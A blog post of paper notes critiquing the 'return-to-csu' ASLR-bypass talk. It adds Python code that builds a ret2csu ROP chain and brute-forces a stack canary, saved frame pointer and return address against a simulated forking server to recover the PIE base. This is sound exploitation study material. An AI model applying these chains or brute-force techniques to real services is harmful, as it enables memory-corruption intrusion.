Title: Paper notes: return-to-csu: A New Method to Bypass 64-bit Linux ASLR
Date: 2018-03-27 16:25

- Complete title: return-to-csu: A New Method to Bypass 64-bit Linux ASLR
- PDF: [de2792f69f394c398a1aef57e1f3ceb322a901a2_asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf]({static}/files/papers/de2792f69f394c398a1aef57e1f3ceb322a901a2_asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf)

The paper presents two ROP gadgets found in `__libc_csu_init`, part of the
[`crt0`](https://en.wikipedia.org/wiki/Crt0) start-up code linked into every
binary (called "attached code" in the paper).
It's public knowledge (at least in the CTF/wargames world) that there are
usable gadgets there: they were described in detail
by [Reno Robert on v0id s3curity](
https://v0ids3curity.blogspot.fr/2013/07/some-gadget-sequence-for-x8664-rop.html
) in 2013, [presented at
AVTokyo](http://inaz2.hatenablog.com/entry/2014/11/16/015347) and
documented by [hatena]( http://inaz2.hatenablog.com/entry/2014/07/31/010158 )
in 2014, documented on x64 by [math1as](http://math1as.com/2016/05/07/linux-x64-common-ropgadget/) in 2016,
and are likely present in your [favourite modern wargame](http://pwnable.kr).

This construction is irrelevant in the real world: if the binary is non-PIE,
you have better gadgets available in the binary itself, and if the binary is PIE,
the gadgets are randomised along with the rest of the text segment, so you can't
use them without a leak anyway.

The two gadgets, as they appear in the paper:

```gas
# first gadget: loads the six callee-saved registers from the stack
pop %rbx
pop %rbp
pop %r12
pop %r13
pop %r14
pop %r15
retq
```

and

```gas
# second gadget: moves the loaded registers into argument registers and
# calls through a pointer table at %r12, indexed by %rbx
mov %r13, %rdx
mov %r14, %rsi
mov %r15d, %edi
callq *(%r12, %rbx, 8)
```
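How the two gadgets are chained in practice, as an added example (not code from the paper or from this post): a small Python helper that lays out the stack words for one ret2csu call. It assumes the register mapping listed above (r13 to %rdx, r14 to %rsi, r15d to %edi; other glibc builds permute these) and that the code following the `callq` is the usual loop tail of `__libc_csu_init` (`add $1,%rbx; cmp %rbp,%rbx; jne`, then `add $8,%rsp`, six pops and `retq`), which the listing above omits. All addresses in the usage section are hypothetical.

```python
import struct

# Added example: lays out the stack words that drive the two
# __libc_csu_init gadgets shown above. Register-to-argument mapping is the
# one from the listing (r13->rdx, r14->rsi, r15d->edi); other glibc builds
# permute r13/r14/r15, so check the target's disassembly before relying on it.


def p64(value):
    """Pack a 64-bit little-endian stack word."""
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


def unpack_chain(chain):
    """Split a chain back into its 64-bit words (for inspection and tests)."""
    return list(struct.unpack("<%dQ" % (len(chain) // 8), chain))


def ret2csu_chain(pop_gadget, call_gadget, fn_ptr_addr, rdi, rsi, rdx, next_ret):
    """Build one ret2csu call: fn(rdi, rsi, rdx), then continue at next_ret.

    pop_gadget   address of 'pop %rbx; pop %rbp; pop %r12; pop %r13;
                 pop %r14; pop %r15; retq'
    call_gadget  address of 'mov %r13,%rdx; mov %r14,%rsi; mov %r15d,%edi;
                 callq *(%r12,%rbx,8)'
    fn_ptr_addr  address of a QWORD holding the function to call (a GOT slot,
                 or a pointer you planted); the gadget dereferences it and does
                 NOT call fn_ptr_addr itself
    next_ret     address the final 'retq' of the gadget sequence returns to
    """
    words = [
        pop_gadget,
        0,            # rbx = 0  -> call *(r12 + 0*8)
        1,            # rbp = 1  -> 'add $1,%rbx; cmp %rbp,%rbx' exits the loop
        fn_ptr_addr,  # r12      -> base of the pointer table
        rdx,          # r13      -> %rdx (3rd argument)
        rsi,          # r14      -> %rsi (2nd argument)
        rdi,          # r15      -> %edi (1st argument, only the low 32 bits!)
        call_gadget,
        # After the call returns, execution continues in __libc_csu_init:
        #   add $1,%rbx ; cmp %rbp,%rbx ; jne <loop>    (not taken, 1 == 1)
        #   add $8,%rsp ; pop %rbx ; pop %rbp ; pop %r12 ; pop %r13 ;
        #   pop %r14 ; pop %r15 ; retq
        0,                      # consumed by 'add $8,%rsp'
        0, 0, 0, 0, 0, 0,       # the six pops; values are irrelevant
        next_ret,
    ]
    return b"".join(p64(w) for w in words)


if __name__ == "__main__":
    # Hypothetical addresses for a non-PIE binary; take the real ones from
    # 'objdump -d' of the target.
    chain = ret2csu_chain(
        pop_gadget=0x4011A2,
        call_gadget=0x401188,
        fn_ptr_addr=0x403FF0,   # e.g. the GOT slot of some libc function
        rdi=0, rsi=0x404060, rdx=0x100,
        next_ret=0x401016,
    )
    for i, w in enumerate(unpack_chain(chain)):
        print("rsp+%3d: 0x%016x" % (i * 8, w))
```

Two things bite people with this chain: the first argument only reaches `%edi`, so a 64-bit pointer cannot be passed in `rdi` this way, and `%r12` has to point at a slot that *contains* the function address (a GOT entry is the usual choice), not at the function itself.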

There are some proposed solutions to get rid of the gadgets, like moving this code into libc, or a
partial rewrite of the binary.

Apparently, the author patched [ropper](https://github.com/sashs/Ropper) to
make it detect the gadgets, but since there is no code in the paper, and no
patch upstream, who knows…

The only ASLR "bypass" present in the paper is a bruteforce of the canary, saved frame
pointer and return address against a forking server, again without code:

```console
./exploit-server_64_PIE.py -s 10.0.2.15 -p 9999
[+] Exploit ASLR 64 bit systems
[+] Trying to find out the canary offset
[+] Offset is 56 bytes
[+] Brute forcing stack canary
[+] SSP value is 0x0e8e6dc24e458900
[+] Brute forcing EBP
[+] EBP value is 0x00007ffd694d4158
[+] Brute forcing Saved EIP
[+] EIP value is 0x0000555cd2686ff4
[+] Text Base at 0x0000555cd2686000
Libc write function is at 0x00007fda3c12a0b0
```
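What that transcript corresponds to, as an added example (not the paper's tool): a byte-at-a-time brute force of the canary, saved `%rbp` and saved return address against a simulated forking server, followed by the text-base computation. The server stand-in, the 56-byte offset and the three secret values are constructed from the transcript above; `RET_SITE_OFFSET` is an assumed offset of the return site inside the binary. The reason this works at all is that a forking server hands every child the same canary and the same layout, so a wrong byte kills only that child and each byte costs at most 256 connections.

```python
# Added example: byte-at-a-time brute force of the canary, saved %rbp and
# saved return address against a simulated forking server. The server class
# is a stand-in for what the transcript above observes over the network;
# the three secret values and the 56-byte offset are constructed from it.

CANARY_OFFSET = 56           # buffer bytes before the canary, per the transcript
RET_SITE_OFFSET = 0xFF4      # assumed: offset of the leaked return site inside
                             # the binary, read from its disassembly


class ForkingServerSim:
    """Stand-in for a forking service with a stack overflow in the child.

    Every child inherits the parent's canary and address-space layout, and a
    failed check kills only that child, so each connection is one free guess.
    survives(payload) is the attacker's oracle:
      True  -> the child replied normally (every overwritten byte matched)
      False -> the connection died (__stack_chk_fail, or a bad return frame)
    Real oracles are noisier for %rbp/%rip than for the canary; this one is exact.
    """

    def __init__(self, canary, saved_rbp, saved_rip):
        self._frame = (canary.to_bytes(8, "little")
                       + saved_rbp.to_bytes(8, "little")
                       + saved_rip.to_bytes(8, "little"))
        self.connections = 0

    def survives(self, payload):
        self.connections += 1
        overwritten = payload[CANARY_OFFSET:]
        # bytes the overflow does not reach keep their original value
        return self._frame.startswith(overwritten)


def brute_force_qword(server, known):
    """Recover the 8 bytes that follow `known` on the stack, one byte at a time.

    At most 256 connections per byte (2048 per word) instead of 2**64 guesses
    for the whole word, which is the entire point of attacking a forking server.
    """
    value = b""
    for _ in range(8):
        for guess in range(256):
            probe = b"A" * CANARY_OFFSET + known + value + bytes([guess])
            if server.survives(probe):
                value += bytes([guess])
                break
        else:
            raise RuntimeError("no byte survived: wrong offset or broken oracle")
    return value


def recover_frame(server):
    """Return (canary, saved_rbp, saved_rip) as integers."""
    canary = brute_force_qword(server, b"")      # glibc zeroes the canary's low
    rbp = brute_force_qword(server, canary)      # byte, so byte 0 costs one try
    rip = brute_force_qword(server, canary + rbp)
    return (int.from_bytes(canary, "little"),
            int.from_bytes(rbp, "little"),
            int.from_bytes(rip, "little"))


def text_base(saved_rip):
    """PIE text base = leaked return address - its offset inside the binary.

    With the base known, the __libc_csu_init gadgets sit at base plus their
    file offsets, which is all the paper's ASLR "bypass" amounts to.
    """
    return saved_rip - RET_SITE_OFFSET


if __name__ == "__main__":
    # constructed secrets, taken from the transcript above
    srv = ForkingServerSim(0x0E8E6DC24E458900, 0x00007FFD694D4158, 0x0000555CD2686FF4)
    canary, rbp, rip = recover_frame(srv)
    print("canary 0x%016x rbp 0x%016x rip 0x%016x" % (canary, rbp, rip))
    print("text base 0x%016x after %d connections" % (text_base(rip), srv.connections))
```

Against a real service the `survives` oracle is whatever distinguishes a child that returned cleanly from one that was killed by `__stack_chk_fail` or crashed on `ret` (a reply arriving versus the socket being closed), and the whole thing falls apart as soon as the server re-executes instead of forking, since every child then gets a fresh canary and layout.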

This seems to be yet another instance of a *return-to-[Blackhat](https://www.blackhat.com/asia-18/briefings.html#return-to-csu-a-new-method-to-bypass-64-bit-linux-aslr)* paper.
